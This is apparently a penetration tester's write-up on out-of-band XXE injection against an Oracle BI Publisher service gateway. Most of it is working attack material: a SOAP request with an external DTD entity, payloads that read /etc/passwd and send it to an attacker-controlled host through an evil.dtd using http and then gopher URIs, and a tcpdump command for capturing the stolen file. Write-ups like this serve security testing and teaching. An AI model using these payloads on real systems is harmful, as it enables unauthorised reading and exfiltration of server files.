Out of Band XXE Injection Via gopher
While I was doing a penetration test , I found a page that uses oracle product .
After searching I have found this exploit which seemed to be valid :
So Let’s try this exploit
POST /xmlpserver/services/ServiceGateway HTTP/1.1
<soapenv:Envelope xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd=”http://www.w3.org/2001/XMLSchema" xmlns:soapenv=”http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser=”http://xmlns.oracle.com/oxp/service/service_gateway">
<incomingXML xsi:type=”xsd:string”><![CDATA[<?xml version=”1.0" encoding=”utf-8"?><!DOCTYPE m [ <!ENTITY % remote SYSTEM “http://attacker/file.xml">%remote;]>]]></incomingXML>
First to identify this exploit let’s try burpcollaborator :
So now , we become sure that there is out of band xml injection , as the server makes dns and http query on burpcollaborator
Let’s try to exfiltrate data using out of band xxe , we could use this payload :
<?xml version=”1.0" encoding=”utf-8"?><!DOCTYPE m [
<!ENTITY % file SYSTEM “file:///etc/passwd”>
<!ENTITY % dtd SYSTEM “http://myhost/evil.dtd">
and the evil.dtd is hosted on my server ,and this its content :
<!ENTITY % all “<!ENTITY send SYSTEM ‘http://myhost:80/%file;'>"> %all;
here we could exfiltrate the first line of /etc/passwd
now our goal is to get the whole /etc/passwd file , I searched for this issue , and one of the methods is to use ftp server and try to connect with ftp://myhost:port , but this method failed as the server reject this uri schema .
At last I manged to do this using gopher uri schema , so the evil.dtd will be as that:
<!ENTITY % all “<!ENTITY send SYSTEM ‘gopher://myhost:80/%file;’>”> %all;
and I did a tcpdump on port 80 using this command :
tcpdump -A src host vulnerablehost and port 80 and greater 1000
As seen we could extract any file using gopher URI schema with out of band xxe injection .